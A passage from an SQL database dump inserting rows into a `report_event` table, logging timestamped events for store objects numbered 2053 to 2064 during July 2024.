(11600, '2024-07-06 13:30:23', 1, 2054, 0, 1, 1),
(11601, '2024-07-06 15:27:53', 1, 2060, 0, 1, 1),
(11602, '2024-07-06 19:46:31', 1, 2064, 0, 1, 1),
(11603, '2024-07-06 21:25:03', 1, 2064, 0, 1, 1),
(11604, '2024-07-07 01:58:21', 1, 2061, 0, 1, 1),
(11605, '2024-07-07 08:56:59', 1, 2064, 0, 1, 1),
(11606, '2024-07-07 09:31:59', 1, 2059, 0, 1, 1),
(11607, '2024-07-07 10:25:46', 1, 2054, 0, 1, 1),
(11608, '2024-07-07 11:21:31', 1, 2055, 0, 1, 1),
(11609, '2024-07-07 11:27:56', 1, 2064, 0, 1, 1),
(11610, '2024-07-07 12:31:54', 1, 2061, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(11611, '2024-07-07 12:44:19', 1, 2058, 0, 1, 1),
(11612, '2024-07-07 12:57:07', 1, 2063, 0, 1, 1),
(11613, '2024-07-07 13:08:42', 1, 2054, 0, 1, 1),
(11614, '2024-07-07 13:20:01', 1, 2062, 0, 1, 1),
(11615, '2024-07-07 13:23:06', 1, 2054, 0, 1, 1),
(11616, '2024-07-07 13:31:45', 1, 2060, 0, 1, 1),
(11617, '2024-07-07 13:42:55', 1, 2059, 0, 1, 1),
(11618, '2024-07-07 19:02:52', 1, 2053, 0, 1, 1),
(11619, '2024-07-07 19:51:52', 1, 2054, 0, 1, 1),
(11620, '2024-07-07 20:05:50', 1, 2055, 0, 1, 1),
(11621, '2024-07-07 20:20:16', 1, 2061, 0, 1, 1),
(11622, '2024-07-07 20:53:16', 1, 2058, 0, 1, 1),
(11623, '2024-07-07 21:03:44', 1, 2064, 0, 1, 1),
(11624, '2024-07-08 06:00:24', 1, 2055, 0, 1, 1),
(11625, '2024-07-08 06:00:24', 1, 2054, 0, 1, 1),
(11626, '2024-07-08 06:00:27', 1, 2059, 0, 1, 1),
(11627, '2024-07-08 06:00:29', 1, 2062, 0, 1, 1),
(11628, '2024-07-08 06:00:30', 1, 2060, 0, 1, 1),
(11629, '2024-07-08 06:00:31', 1, 2064, 0, 1, 1),
(11630, '2024-07-08 06:00:32', 1, 2061, 0, 1, 1),
(11631, '2024-07-08 06:00:33', 1, 2063, 0, 1, 1),
(11632, '2024-07-08 06:00:34', 1, 2058, 0, 1, 1),
(11633, '2024-07-08 06:16:05', 1, 2060, 0, 1, 1),
(11634, '2024-07-08 06:38:49', 1, 2054, 0, 1, 1),
(11635, '2024-07-08 06:45:32', 1, 2054, 0, 1, 1),
(11636, '2024-07-08 07:42:45', 1, 2062, 0, 1, 1),
(11637, '2024-07-08 13:23:57', 1, 2060, 0, 1, 1),
(11638, '2024-07-08 14:16:44', 1, 2064, 0, 1, 1),
(11639, '2024-07-08 15:29:14', 1, 2064, 0, 1, 1),
(11640, '2024-07-08 15:29:29', 1, 2054, 0, 1, 1),
(11641, '2024-07-08 16:48:46', 1, 2064, 0, 1, 1),
(11642, '2024-07-08 17:54:40', 1, 2064, 0, 1, 1),
(11643, '2024-07-08 19:02:14', 1, 2055, 0, 1, 1),
(11644, '2024-07-08 19:02:16', 1, 2054, 0, 1, 1),
(11645, '2024-07-08 19:02:35', 1, 2060, 0, 1, 1),
(11646, '2024-07-08 19:02:40', 1, 2053, 0, 1, 1),
(11647, '2024-07-08 19:02:45', 1, 2061, 0, 1, 1),
(11648, '2024-07-08 19:02:57', 1, 2058, 0, 1, 1),
(11649, '2024-07-08 19:03:00', 1, 2064, 0, 1, 1),
(11650, '2024-07-08 19:03:04', 1, 2059, 0, 1, 1),
(11651, '2024-07-09 10:26:26', 1, 2064, 0, 1, 1),
(11652, '2024-07-09 11:23:02', 1, 2064, 0, 1, 1),
(11653, '2024-07-09 12:49:25', 1, 2054, 0, 1, 1),
(11654, '2024-07-09 17:56:14', 1, 2054, 0, 1, 1),
(11655, '2024-07-09 23:56:12', 1, 2062, 0, 1, 1),
(11656, '2024-07-09 23:56:36', 1, 2063, 0, 1, 1),
(11657, '2024-07-10 00:26:16', 1, 2061, 0, 1, 1),
(11658, '2024-07-10 00:26:19', 1, 2053, 0, 1, 1),
(11659, '2024-07-10 00:26:22', 1, 2055, 0, 1, 1),
(11660, '2024-07-10 00:26:29', 1, 2060, 0, 1, 1),
(11661, '2024-07-10 00:26:33', 1, 2064, 0, 1, 1),
(11662, '2024-07-10 00:26:47', 1, 2059, 0, 1, 1),
(11663, '2024-07-10 00:26:59', 1, 2058, 0, 1, 1),
(11664, '2024-07-10 00:27:07', 1, 2054, 0, 1, 1),
(11665, '2024-07-10 01:34:01', 1, 2062, 0, 1, 1),
(11666, '2024-07-10 01:34:10', 1, 2063, 0, 1, 1),
(11667, '2024-07-10 02:42:48', 1, 2064, 0, 1, 1),
(11668, '2024-07-10 04:17:11', 1, 2054, 0, 1, 1),
(11669, '2024-07-10 04:17:15', 1, 2059, 0, 1, 1),
(11670, '2024-07-10 04:17:42', 1, 2053, 0, 1, 1),
(11671, '2024-07-10 04:27:07', 1, 2063, 0, 1, 1),
(11672, '2024-07-10 04:27:54', 1, 2062, 0, 1, 1),
(11673, '2024-07-10 04:28:07', 1, 2060, 0, 1, 1),
(11674, '2024-07-10 04:37:19', 1, 2055, 0, 1, 1),
(11675, '2024-07-10 04:37:26', 1, 2058, 0, 1, 1),
(11676, '2024-07-10 04:37:46', 1, 2061, 0, 1, 1),
(11677, '2024-07-10 04:38:29', 1, 2064, 0, 1, 1),
(11678, '2024-07-10 07:32:39', 1, 2059, 0, 1, 1),
(11679, '2024-07-10 07:32:41', 1, 2059, 0, 1, 1),
(11680, '2024-07-10 07:32:46', 1, 2059, 0, 1, 1),
(11681, '2024-07-10 07:34:40', 1, 2058, 0, 1, 1),
(11682, '2024-07-10 07:34:46', 1, 2058, 0, 1, 1),
(11683, '2024-07-10 11:30:02', 1, 2062, 0, 1, 1),
(11684, '2024-07-10 17:11:04', 1, 2054, 0, 1, 1),
(11685, '2024-07-10 18:44:01', 1, 2055, 0, 1, 1),
(11686, '2024-07-10 18:52:52', 1, 2055, 0, 1, 1),
(11687, '2024-07-11 01:40:58', 1, 2061, 0, 1, 1),
(11688, '2024-07-11 01:41:01', 1, 2064, 0, 1, 1),
(11689, '2024-07-11 01:41:02', 1, 2059, 0, 1, 1),
(11690, '2024-07-11 01:41:03', 1, 2058, 0, 1, 1),
(11691, '2024-07-11 01:41:04', 1, 2062, 0, 1, 1),
(11692, '2024-07-11 01:41:06', 1, 2063, 0, 1, 1),
(11693, '2024-07-11 01:41:07', 1, 2063, 0, 1, 1),
(11694, '2024-07-11 01:41:33', 1, 2060, 0, 1, 1),
(11695, '2024-07-11 01:41:42', 1, 2054, 0, 1, 1),
(11696, '2024-07-11 01:41:43', 1, 2055, 0, 1, 1),
(11697, '2024-07-11 01:41:44', 1, 2064, 0, 1, 1),
(11698, '2024-07-11 01:41:47', 1, 2053, 0, 1, 1),
(11699, '2024-07-11 01:41:48', 1, 2064, 0, 1, 1),
(11700, '2024-07-11 02:22:21', 1, 2063, 0, 1, 1),
(11701, '2024-07-11 03:12:01', 1, 2062, 0, 1, 1),
(11702, '2024-07-11 03:32:04', 1, 2064, 0, 1, 1),
(11703, '2024-07-11 03:46:31', 1, 2055, 0, 1, 1),
(11704, '2024-07-11 05:57:40', 1, 2058, 0, 1, 1),
(11705, '2024-07-11 05:58:40', 1, 2058, 0, 1, 1),
(11706, '2024-07-11 06:10:35', 1, 2063, 0, 1, 1),
(11707, '2024-07-11 08:31:18', 1, 2062, 0, 1, 1),
(11708, '2024-07-11 12:04:14', 1, 2063, 0, 1, 1),
(11709, '2024-07-11 12:04:17', 1, 2061, 0, 1, 1),
(11710, '2024-07-11 12:04:18', 1, 2059, 0, 1, 1),
(11711, '2024-07-11 12:04:20', 1, 2064, 0, 1, 1),
(11712, '2024-07-11 12:04:21', 1, 2058, 0, 1, 1),
(11713, '2024-07-11 12:04:23', 1, 2062, 0, 1, 1),
(11714, '2024-07-11 12:04:25', 1, 2062, 0, 1, 1),
(11715, '2024-07-11 12:04:57', 1, 2060, 0, 1, 1),
(11716, '2024-07-11 12:05:04', 1, 2054, 0, 1, 1),
(11717, '2024-07-11 12:05:05', 1, 2064, 0, 1, 1),
(11718, '2024-07-11 12:05:08', 1, 2064, 0, 1, 1),
(11719, '2024-07-11 12:05:09', 1, 2055, 0, 1, 1),
(11720, '2024-07-11 12:05:10', 1, 2053, 0, 1, 1),
(11721, '2024-07-11 18:17:04', 1, 2059, 0, 1, 1),
(11722, '2024-07-11 18:40:52', 1, 2061, 0, 1, 1),
(11723, '2024-07-11 20:23:11', 1, 2059, 0, 1, 1),
(11724, '2024-07-11 20:35:40', 1, 2058, 0, 1, 1),
(11725, '2024-07-11 22:50:14', 1, 2063, 0, 1, 1),
(11726, '2024-07-11 22:50:59', 1, 2061, 0, 1, 1),
(11727, '2024-07-11 22:56:01', 1, 2053, 0, 1, 1),
(11728, '2024-07-12 01:50:08', 1, 2063, 0, 1, 1),
(11729, '2024-07-12 01:56:59', 1, 2064, 0, 1, 1),
(11730, '2024-07-12 02:49:33', 1, 2054, 0, 1, 1),
(11731, '2024-07-12 02:56:14', 1, 2059, 0, 1, 1),
(11732, '2024-07-12 03:04:02', 1, 2060, 0, 1, 1),
(11733, '2024-07-12 06:35:25', 1, 2058, 0, 1, 1),
(11734, '2024-07-12 08:37:44', 1, 2064, 0, 1, 1),
(11735, '2024-07-12 09:16:10', 1, 2064, 0, 1, 1),
(11736, '2024-07-12 09:35:40', 1, 2060, 0, 1, 1),
(11737, '2024-07-12 09:35:44', 1, 2061, 0, 1, 1),
(11738, '2024-07-12 09:35:56', 1, 2058, 0, 1, 1),
(11739, '2024-07-12 09:36:10', 1, 2064, 0, 1, 1),
(11740, '2024-07-12 09:36:22', 1, 2059, 0, 1, 1),
(11741, '2024-07-12 09:37:09', 1, 2064, 0, 1, 1),
(11742, '2024-07-12 09:37:22', 1, 2055, 0, 1, 1),
(11743, '2024-07-12 09:37:35', 1, 2054, 0, 1, 1),
(11744, '2024-07-12 10:36:25', 1, 2058, 0, 1, 1),
(11745, '2024-07-12 11:12:01', 1, 2061, 0, 1, 1),
(11746, '2024-07-12 22:57:40', 1, 2054, 0, 1, 1),
(11747, '2024-07-13 03:11:04', 1, 2062, 0, 1, 1),
(11748, '2024-07-13 06:21:19', 1, 2062, 0, 1, 1),
(11749, '2024-07-13 06:32:24', 1, 2053, 0, 1, 1),
(11750, '2024-07-13 07:13:30', 1, 2054, 0, 1, 1),
(11751, '2024-07-13 07:23:38', 1, 2062, 0, 1, 1),
(11752, '2024-07-13 08:26:10', 1, 2064, 0, 1, 1),
(11753, '2024-07-13 10:43:57', 1, 2053, 0, 1, 1),
(11754, '2024-07-13 11:16:24', 1, 2054, 0, 1, 1),
(11755, '2024-07-13 11:16:31', 1, 2059, 0, 1, 1),
(11756, '2024-07-13 11:16:36', 1, 2061, 0, 1, 1),
(11757, '2024-07-13 11:16:42', 1, 2058, 0, 1, 1),
(11758, '2024-07-13 12:11:38', 1, 2064, 0, 1, 1),
(11759, '2024-07-13 12:15:34', 1, 2060, 0, 1, 1),
(11760, '2024-07-13 15:36:09', 1, 2062, 0, 1, 1),
(11761, '2024-07-13 16:38:16', 1, 2064, 0, 1, 1),
(11762, '2024-07-13 17:31:08', 1, 2062, 0, 1, 1),
(11763, '2024-07-13 17:51:57', 1, 2062, 2375, 1, 1),
(11764, '2024-07-13 18:32:49', 1, 2060, 0, 1, 1),
(11765, '2024-07-13 18:43:23', 1, 2063, 0, 1, 1),
(11766, '2024-07-13 19:05:17', 1, 2058, 0, 1, 1),
(11767, '2024-07-13 19:46:23', 1, 2055, 0, 1, 1),
(11768, '2024-07-13 20:56:22', 1, 2061, 0, 1, 1),
(11769, '2024-07-13 21:45:12', 1, 2060, 0, 1, 1),
(11770, '2024-07-13 21:54:30', 1, 2063, 0, 1, 1),
(11771, '2024-07-14 01:45:36', 1, 2061, 0, 1, 1),
(11772, '2024-07-14 05:54:30', 1, 2055, 0, 1, 1),
(11773, '2024-07-14 08:28:06', 1, 2060, 0, 1, 1),
(11774, '2024-07-14 08:37:53', 1, 2063, 0, 1, 1),
(11775, '2024-07-14 09:02:05', 1, 2058, 0, 1, 1),
(11776, '2024-07-14 09:45:23', 1, 2055, 0, 1, 1),
(11777, '2024-07-14 10:55:14', 1, 2061, 0, 1, 1),
(11778, '2024-07-14 11:31:05', 1, 2062, 0, 1, 1),
(11779, '2024-07-14 12:02:31', 1, 2055, 0, 1, 1),
(11780, '2024-07-14 12:02:34', 1, 2061, 0, 1, 1),
(11781, '2024-07-14 12:02:35', 1, 2058, 0, 1, 1),
(11782, '2024-07-14 12:02:36', 1, 2059, 0, 1, 1),
(11783, '2024-07-14 12:02:37', 1, 2054, 0, 1, 1),
(11784, '2024-07-14 12:02:38', 1, 2063, 0, 1, 1),
(11785, '2024-07-14 12:02:40', 1, 2064, 0, 1, 1),
(11786, '2024-07-14 12:02:42', 1, 2060, 0, 1, 1),
(11787, '2024-07-14 12:02:46', 1, 2062, 0, 1, 1),
(11788, '2024-07-14 12:02:51', 1, 2053, 0, 1, 1),
(11789, '2024-07-14 12:06:49', 1, 2053, 0, 1, 1),
(11790, '2024-07-14 12:48:55', 1, 2054, 0, 1, 1),
(11791, '2024-07-14 13:03:50', 1, 2059, 0, 1, 1),
(11792, '2024-07-14 13:16:37', 1, 2064, 0, 1, 1),
(11793, '2024-07-14 20:05:23', 1, 2055, 0, 1, 1),
(11794, '2024-07-14 23:13:33', 1, 2060, 0, 1, 1),
(11795, '2024-07-14 23:21:36', 1, 2063, 0, 1, 1),
(11796, '2024-07-14 23:21:38', 1, 2061, 0, 1, 1),
(11797, '2024-07-14 23:21:43', 1, 2055, 0, 1, 1),
(11798, '2024-07-14 23:21:46', 1, 2064, 0, 1, 1),
(11799, '2024-07-14 23:21:50', 1, 2060, 0, 1, 1),
(11800, '2024-07-14 23:21:55', 1, 2059, 0, 1, 1),
(11801, '2024-07-14 23:22:02', 1, 2058, 0, 1, 1),
(11802, '2024-07-14 23:23:13', 1, 2062, 0, 1, 1),
(11803, '2024-07-14 23:23:18', 1, 2054, 0, 1, 1),
(11804, '2024-07-14 23:26:29', 1, 2061, 0, 1, 1),
(11805, '2024-07-14 23:26:43', 1, 2054, 0, 1, 1),
(11806, '2024-07-14 23:26:51', 1, 2059, 0, 1, 1),
(11807, '2024-07-14 23:26:55', 1, 2058, 0, 1, 1),
(11808, '2024-07-14 23:27:13', 1, 2060, 0, 1, 1),
(11809, '2024-07-14 23:28:43', 1, 2053, 0, 1, 1),
(11810, '2024-07-14 23:29:04', 1, 2055, 0, 1, 1),
(11811, '2024-07-14 23:29:44', 1, 2064, 0, 1, 1),
(11812, '2024-07-14 23:30:09', 1, 2063, 0, 1, 1),
(11813, '2024-07-14 23:30:17', 1, 2062, 0, 1, 1),
(11814, '2024-07-14 23:30:42', 1, 2060, 0, 1, 1),
(11815, '2024-07-14 23:49:04', 1, 2060, 0, 1, 1),
(11816, '2024-07-14 23:59:29', 1, 2063, 0, 1, 1),
(11817, '2024-07-15 00:20:48', 1, 2058, 0, 1, 1),
(11818, '2024-07-15 00:58:45', 1, 2055, 0, 1, 1),
(11819, '2024-07-15 01:46:40', 1, 2062, 0, 1, 1),
(11820, '2024-07-15 02:06:20', 1, 2061, 0, 1, 1),
(11821, '2024-07-15 02:23:20', 1, 2055, 0, 1, 1),
(11822, '2024-07-15 02:23:25', 1, 2064, 0, 1, 1),
(11823, '2024-07-15 02:23:28', 1, 2061, 0, 1, 1),
(11824, '2024-07-15 02:23:33', 1, 2058, 0, 1, 1),
(11825, '2024-07-15 02:44:23', 1, 2062, 0, 1, 1),
(11826, '2024-07-15 04:09:00', 1, 2054, 0, 1, 1),
(11827, '2024-07-15 04:25:41', 1, 2059, 0, 1, 1),
(11828, '2024-07-15 04:39:49', 1, 2064, 0, 1, 1),
(11829, '2024-07-15 15:20:10', 1, 2054, 0, 1, 1),
(11830, '2024-07-15 16:25:30', 1, 2054, 0, 1, 1),
(11831, '2024-07-15 20:09:17', 1, 2064, 0, 1, 1),
(11832, '2024-07-15 21:03:44', 1, 2055, 0, 1, 1),
(11833, '2024-07-15 23:59:55', 1, 2054, 0, 1, 1),
(11834, '2024-07-16 01:03:50', 1, 2064, 0, 1, 1),
(11835, '2024-07-16 01:11:01', 1, 2054, 0, 1, 1),
(11836, '2024-07-16 09:18:34', 1, 2060, 0, 1, 1),
(11837, '2024-07-16 10:02:09', 1, 2053, 0, 1, 1),
(11838, '2024-07-16 10:15:51', 1, 2061, 0, 1, 1),
(11839, '2024-07-16 12:44:11', 1, 2063, 0, 1, 1),
(11840, '2024-07-16 21:47:37', 1, 2064, 0, 1, 1),
(11841, '2024-07-16 22:15:21', 1, 2064, 0, 1, 1),
(11842, '2024-07-16 23:52:34', 1, 2063, 0, 1, 1),
(11843, '2024-07-17 08:55:52', 1, 2064, 0, 1, 1),
(11844, '2024-07-17 09:21:50', 1, 2064, 0, 1, 1),
(11845, '2024-07-17 10:20:29', 1, 2060, 0, 1, 1),
(11846, '2024-07-17 10:22:14', 1, 2060, 0, 1, 1),
(11847, '2024-07-17 11:37:07', 1, 2060, 0, 1, 1),
(11848, '2024-07-17 12:24:20', 1, 2053, 0, 1, 1),
(11849, '2024-07-17 13:46:08', 1, 2053, 0, 1, 1),
(11850, '2024-07-17 15:44:52', 1, 2064, 0, 1, 1),
(11851, '2024-07-17 16:49:44', 1, 2058, 0, 1, 1),
(11852, '2024-07-17 20:44:00', 1, 2064, 0, 1, 1),
(11853, '2024-07-17 21:20:07', 1, 2061, 0, 1, 1),
(11854, '2024-07-18 10:12:00', 1, 2058, 0, 1, 1),
(11855, '2024-07-18 11:48:29', 1, 2064, 0, 1, 1),
(11856, '2024-07-18 12:25:40', 1, 2059, 0, 1, 1),
(11857, '2024-07-18 13:33:23', 1, 2060, 0, 1, 1),
(11858, '2024-07-18 14:07:59', 1, 2064, 0, 1, 1),
(11859, '2024-07-18 14:57:44', 1, 2064, 0, 1, 1),
(11860, '2024-07-18 22:18:59', 1, 2062, 0, 1, 1),
(11861, '2024-07-18 22:45:52', 1, 2054, 0, 1, 1),
(11862, '2024-07-19 02:47:31', 1, 2064, 0, 1, 1),
(11863, '2024-07-19 13:45:36', 1, 2055, 0, 1, 1),
(11864, '2024-07-19 20:07:02', 1, 2059, 0, 1, 1),
(11865, '2024-07-19 21:51:04', 1, 2061, 0, 1, 1),
(11866, '2024-07-21 00:39:26', 1, 2063, 0, 1, 1),
(11867, '2024-07-21 08:04:18', 1, 2060, 0, 1, 1),
(11868, '2024-07-22 05:38:43', 1, 2054, 0, 1, 1),
(11869, '2024-07-23 15:59:55', 1, 2061, 0, 1, 1),
(11870, '2024-07-23 22:11:03', 1, 2059, 0, 1, 1),
(11871, '2024-07-23 22:49:43', 1, 2054, 0, 1, 1),
(11872, '2024-07-23 23:10:57', 1, 2059, 0, 1, 1),
(11873, '2024-07-23 23:34:33', 1, 2058, 0, 1, 1),
(11874, '2024-07-24 05:08:48', 1, 2058, 0, 1, 1),
(11875, '2024-07-24 05:21:17', 1, 2064, 0, 1, 1),
(11876, '2024-07-24 05:56:17', 1, 2058, 0, 1, 1),
(11877, '2024-07-24 05:56:17', 1, 2058, 0, 1, 1),
(11878, '2024-07-24 10:15:00', 1, 2054, 0, 1, 1),
(11879, '2024-07-24 11:24:33', 1, 2058, 0, 1, 1),
(11880, '2024-07-24 14:18:51', 1, 2058, 0, 1, 1),
(11881, '2024-07-24 14:18:51', 1, 2058, 0, 1, 1),
(11882, '2024-07-24 20:21:54', 1, 2054, 0, 1, 1),
(11883, '2024-07-24 20:46:00', 1, 2060, 0, 1, 1),
(11884, '2024-07-24 20:59:27', 1, 2053, 0, 1, 1),
(11885, '2024-07-24 21:14:44', 1, 2061, 0, 1, 1),
(11886, '2024-07-24 22:12:28', 1, 2059, 0, 1, 1),
(11887, '2024-07-24 22:33:07', 1, 2064, 0, 1, 1),
(11888, '2024-07-24 23:00:24', 1, 2062, 0, 1, 1),
(11889, '2024-07-24 23:03:55', 1, 2064, 0, 1, 1),
(11890, '2024-07-24 23:13:15', 1, 2064, 0, 1, 1),
(11891, '2024-07-24 23:22:00', 1, 2054, 0, 1, 1),
(11892, '2024-07-24 23:41:01', 1, 2062, 0, 1, 1),
(11893, '2024-07-24 23:53:13', 1, 2054, 0, 1, 1),
(11894, '2024-07-24 23:53:31', 1, 2054, 0, 1, 1),
(11895, '2024-07-25 00:10:16', 1, 2062, 0, 1, 1),
(11896, '2024-07-25 00:18:44', 1, 2060, 0, 1, 1),
(11897, '2024-07-25 00:48:42', 1, 2061, 0, 1, 1),
(11898, '2024-07-25 01:35:06', 1, 2059, 0, 1, 1),
(11899, '2024-07-25 02:03:08', 1, 2054, 0, 1, 1),
(11900, '2024-07-25 02:03:08', 1, 2061, 0, 1, 1),
(11901, '2024-07-25 02:03:11', 1, 2059, 0, 1, 1),
(11902, '2024-07-25 02:10:21', 1, 2064, 0, 1, 1),
(11903, '2024-07-25 02:36:50', 1, 2062, 0, 1, 1),
(11904, '2024-07-25 03:15:29', 1, 2055, 0, 1, 1),
(11905, '2024-07-25 03:56:16', 1, 2063, 0, 1, 1),
(11906, '2024-07-25 04:09:13', 1, 2058, 0, 1, 1),
(11907, '2024-07-25 09:00:15', 1, 2053, 0, 1, 1),
(11908, '2024-07-25 11:10:18', 1, 2061, 0, 1, 1),
(11909, '2024-07-25 11:38:27', 1, 2055, 0, 1, 1),
(11910, '2024-07-25 18:14:14', 1, 2054, 0, 1, 1),
(11911, '2024-07-25 18:29:20', 1, 2054, 0, 1, 1),
(11912, '2024-07-25 20:43:41', 1, 2060, 0, 1, 1),
(11913, '2024-07-25 20:44:31', 1, 2059, 0, 1, 1),
(11914, '2024-07-25 20:45:07', 1, 2061, 0, 1, 1),
(11915, '2024-07-25 20:45:47', 1, 2058, 0, 1, 1),
(11916, '2024-07-25 22:45:06', 1, 2054, 0, 1, 1),
(11917, '2024-07-25 23:27:48', 1, 2058, 0, 1, 1),
(11918, '2024-07-26 00:25:46', 1, 2053, 0, 1, 1),
(11919, '2024-07-26 00:26:20', 1, 2054, 0, 1, 1),
(11920, '2024-07-26 00:26:59', 1, 2055, 0, 1, 1),
(11921, '2024-07-26 00:32:50', 1, 2064, 0, 1, 1),
(11922, '2024-07-26 00:37:39', 1, 2063, 0, 1, 1),
(11923, '2024-07-26 00:38:14', 1, 2062, 0, 1, 1),
(11924, '2024-07-26 00:38:52', 1, 2060, 0, 1, 1),
(11925, '2024-07-26 00:39:30', 1, 2059, 0, 1, 1),
(11926, '2024-07-26 00:40:09', 1, 2061, 0, 1, 1),
(11927, '2024-07-26 03:51:16', 1, 2062, 0, 1, 1),
(11928, '2024-07-26 04:34:05', 1, 2053, 0, 1, 1),
(11929, '2024-07-26 04:34:41', 1, 2054, 0, 1, 1),
(11930, '2024-07-26 04:35:17', 1, 2055, 0, 1, 1),
(11931, '2024-07-26 04:38:23', 1, 2063, 0, 1, 1),
(11932, '2024-07-26 04:40:57', 1, 2064, 0, 1, 1),
(11933, '2024-07-26 14:05:32', 1, 2060, 0, 1, 1),
(11934, '2024-07-26 18:57:26', 1, 2055, 0, 1, 1),
(11935, '2024-07-26 21:00:36', 1, 2054, 0, 1, 1),
(11936, '2024-07-26 21:46:29', 1, 2064, 0, 1, 1),
(11937, '2024-07-27 13:30:51', 1, 2059, 0, 1, 1),
(11938, '2024-07-27 21:04:17', 1, 2064, 0, 1, 1),
(11939, '2024-07-28 04:54:48', 1, 2054, 0, 1, 1),
(11940, '2024-07-28 08:52:19', 1, 2063, 0, 1, 1),
(11941, '2024-07-28 11:32:23', 1, 2062, 0, 1, 1),
(11942, '2024-07-28 23:45:17', 1, 2060, 0, 1, 1),
(11943, '2024-07-29 01:37:47', 1, 2055, 0, 1, 1),
(11944, '2024-07-29 03:21:39', 1, 2063, 0, 1, 1),
(11945, '2024-07-29 05:37:53', 1, 2058, 0, 1, 1),
(11946, '2024-07-29 10:12:06', 1, 2061, 0, 1, 1),
(11947, '2024-07-29 11:10:16', 1, 2064, 0, 1, 1),
(11948, '2024-07-29 15:39:37', 1, 2063, 0, 1, 1),
(11949, '2024-07-30 00:03:34', 1, 2064, 0, 1, 1),
(11950, '2024-07-30 03:43:42', 1, 2054, 0, 1, 1),
(11951, '2024-07-30 10:38:43', 1, 2064, 0, 1, 1),
(11952, '2024-07-30 14:12:30', 1, 2059, 0, 1, 1),
(11953, '2024-07-30 15:38:56', 1, 2061, 0, 1, 1),
(11954, '2024-07-30 16:51:39', 4, 2054, 0, 1, 1),
(11955, '2024-07-30 17:50:51', 1, 2061, 0, 1, 1),
(11956, '2024-07-31 00:49:47', 1, 2064, 0, 1, 1),
(11957, '2024-07-31 03:10:01', 1, 2058, 0, 1, 1),
(11958, '2024-07-31 04:28:41', 1, 2064, 0, 1, 1),
(11959, '2024-07-31 04:39:23', 1, 2053, 0, 1, 1),
(11960, '2024-07-31 07:18:05', 1, 2054, 0, 1, 1),
(11961, '2024-07-31 09:11:20', 1, 2054, 0, 1, 1),
(11962, '2024-07-31 18:22:02', 1, 2054, 0, 1, 1),
(11963, '2024-07-31 18:43:48', 1, 2064, 0, 1, 1),
(11964, '2024-07-31 19:16:06', 1, 2062, 0, 1, 1),
(11965, '2024-07-31 19:35:08', 4, 2054, 0, 1, 1),
(11966, '2024-08-01 03:07:15', 1, 2064, 0, 1, 1),
(11967, '2024-08-01 03:07:21', 1, 2063, 0, 1, 1),
(11968, '2024-08-01 03:07:25', 1, 2062, 0, 1, 1),
(11969, '2024-08-01 03:07:29', 1, 2061, 0, 1, 1),
(11970, '2024-08-01 03:07:32', 1, 2060, 0, 1, 1),
(11971, '2024-08-01 03:07:41', 1, 2061, 0, 1, 1),
(11972, '2024-08-01 03:07:44', 1, 2059, 0, 1, 1),
(11973, '2024-08-01 03:07:50', 1, 2058, 0, 1, 1),
(11974, '2024-08-01 03:07:53', 1, 2054, 0, 1, 1),
(11975, '2024-08-01 03:08:02', 1, 2058, 0, 1, 1),
(11976, '2024-08-01 03:08:05', 1, 2061, 0, 1, 1),
(11977, '2024-08-01 03:08:08', 1, 2063, 0, 1, 1),
(11978, '2024-08-01 03:08:18', 1, 2055, 0, 1, 1),
(11979, '2024-08-01 03:08:22', 1, 2064, 0, 1, 1),
(11980, '2024-08-01 03:08:25', 1, 2058, 0, 1, 1),
(11981, '2024-08-01 03:08:28', 1, 2059, 0, 1, 1),
(11982, '2024-08-01 03:08:31', 1, 2060, 0, 1, 1),
(11983, '2024-08-01 03:08:33', 1, 2061, 0, 1, 1),
(11984, '2024-08-01 03:08:37', 1, 2062, 0, 1, 1),
(11985, '2024-08-01 03:08:40', 1, 2063, 0, 1, 1),
(11986, '2024-08-01 03:08:44', 1, 2054, 0, 1, 1),
(11987, '2024-08-01 03:08:47', 1, 2060, 0, 1, 1),
(11988, '2024-08-01 03:08:51', 1, 2059, 0, 1, 1),
(11989, '2024-08-01 03:08:54', 1, 2062, 0, 1, 1),
(11990, '2024-08-01 03:09:02', 1, 2064, 0, 1, 1),
(11991, '2024-08-01 03:09:06', 1, 2063, 0, 1, 1),
(11992, '2024-08-01 03:09:09', 1, 2062, 0, 1, 1),
(11993, '2024-08-01 03:09:11', 1, 2061, 0, 1, 1),
(11994, '2024-08-01 03:09:16', 1, 2060, 0, 1, 1),
(11995, '2024-08-01 03:09:18', 1, 2059, 0, 1, 1),
(11996, '2024-08-01 03:09:21', 1, 2058, 0, 1, 1),
(11997, '2024-08-01 03:09:24', 1, 2055, 0, 1, 1),
(11998, '2024-08-01 03:09:28', 1, 2054, 0, 1, 1),
(11999, '2024-08-01 03:09:32', 1, 2053, 0, 1, 1),
(12000, '2024-08-01 03:09:41', 1, 2064, 0, 1, 1),
(12001, '2024-08-01 03:09:45', 1, 2058, 0, 1, 1),
(12002, '2024-08-01 03:09:48', 1, 2059, 0, 1, 1),
(12003, '2024-08-01 03:09:52', 1, 2060, 0, 1, 1),
(12004, '2024-08-01 03:09:55', 1, 2061, 0, 1, 1),
(12005, '2024-08-01 03:09:58', 1, 2062, 0, 1, 1),
(12006, '2024-08-01 03:10:01', 1, 2063, 0, 1, 1),
(12007, '2024-08-01 03:10:16', 1, 2064, 0, 1, 1),
(12008, '2024-08-01 03:10:20', 1, 2063, 0, 1, 1),
(12009, '2024-08-01 03:10:24', 1, 2062, 0, 1, 1),
(12010, '2024-08-01 03:10:26', 1, 2061, 0, 1, 1),
(12011, '2024-08-01 03:10:28', 1, 2060, 0, 1, 1),
(12012, '2024-08-01 03:10:31', 1, 2059, 0, 1, 1),
(12013, '2024-08-01 03:10:35', 1, 2058, 0, 1, 1),
(12014, '2024-08-01 03:10:37', 1, 2055, 0, 1, 1),
(12015, '2024-08-01 03:10:40', 1, 2054, 0, 1, 1),
(12016, '2024-08-01 03:10:43', 1, 2064, 0, 1, 1),
(12017, '2024-08-01 03:10:48', 1, 2058, 0, 1, 1),
(12018, '2024-08-01 03:10:52', 1, 2059, 0, 1, 1),
(12019, '2024-08-01 03:10:55', 1, 2060, 0, 1, 1),
(12020, '2024-08-01 03:10:59', 1, 2061, 0, 1, 1),
(12021, '2024-08-01 03:11:02', 1, 2062, 0, 1, 1),
(12022, '2024-08-01 03:11:05', 1, 2063, 0, 1, 1),
(12023, '2024-08-01 03:11:13', 1, 2064, 0, 1, 1),
(12024, '2024-08-01 03:11:16', 1, 2063, 0, 1, 1),
(12025, '2024-08-01 03:11:19', 1, 2062, 0, 1, 1),
